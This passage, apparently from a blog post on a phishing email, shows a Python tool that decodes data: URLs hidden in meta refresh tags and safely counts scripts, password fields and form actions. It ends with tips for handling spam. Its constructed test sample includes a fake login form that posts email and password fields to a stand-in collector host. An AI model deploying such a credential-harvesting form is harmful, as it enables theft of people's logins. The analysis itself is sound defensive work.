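        data = unquote(body).encode("utf-8")
    return media_type, data


def analyse_page(html):
    """Return one report dict per meta refresh target found in `html`."""
    report = []
    for target in find_meta_refresh_targets(html):
        if not target.lower().startswith("data:"):
            report.append({"kind": "external", "target": target})
            continue
        media_type, data = decode_data_url(target)
        had_bom = data.startswith(b"\xef\xbb\xbf")
        text = data.decode("utf-8-sig", errors="replace")  # utf-8-sig drops the BOM
        report.append({
            "kind": "data",
            "media_type": media_type,
            "had_bom": had_bom,
            "scripts": len(re.findall(r"<script\b", text, re.I)),
            "password_fields": len(re.findall(r'type\s*=\s*["\']?password', text, re.I)),
            "form_actions": re.findall(r'<form[^>]*\baction\s*=\s*["\']([^"\']*)', text, re.I),
        })
    return report


# Constructed inner page: BOM + " \r\n" first, so its base64 starts with the
# same "77u/IA0K" prefix seen in the real meta refresh; the rest is a stand-in.
INNER_PAGE = (
    "\ufeff \r\n<html><body>"
    '<form action="http://collector.example/post.php">'
    '<input name="Email"><input type="password" name="Passwd"></form>'
    "<script>/* obfuscated code omitted in this constructed sample */</script>"
    "</body></html>"
)
SAMPLE_B64 = base64.b64encode(INNER_PAGE.encode("utf-8")).decode("ascii")
SAMPLE_HTML = (
    "<html><head>\n"
    f'<meta http-equiv="Refresh" content="1; url=data:text/html;base64, {SAMPLE_B64}">\n'
    "</head></html>"
)

if __name__ == "__main__":
    for entry in analyse_page(SAMPLE_HTML):
        print(entry)
```

Run it against a saved copy of a suspicious page (`analyse_page(open("orin.htm").read())`) rather than opening the data: URL in a browser; the decoded text is only ever treated as data here, so any script inside it is counted, never executed.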

Sum Up

Spam does no harm if you understand what's going on. From the case here, we can learn that we should:
  • check the sender's domain
  • open suspicious URLs in Tor Browser
  • beware of the URL itself
  • mark spam in your Gmail if you find any, which helps Google stop it spreading to other people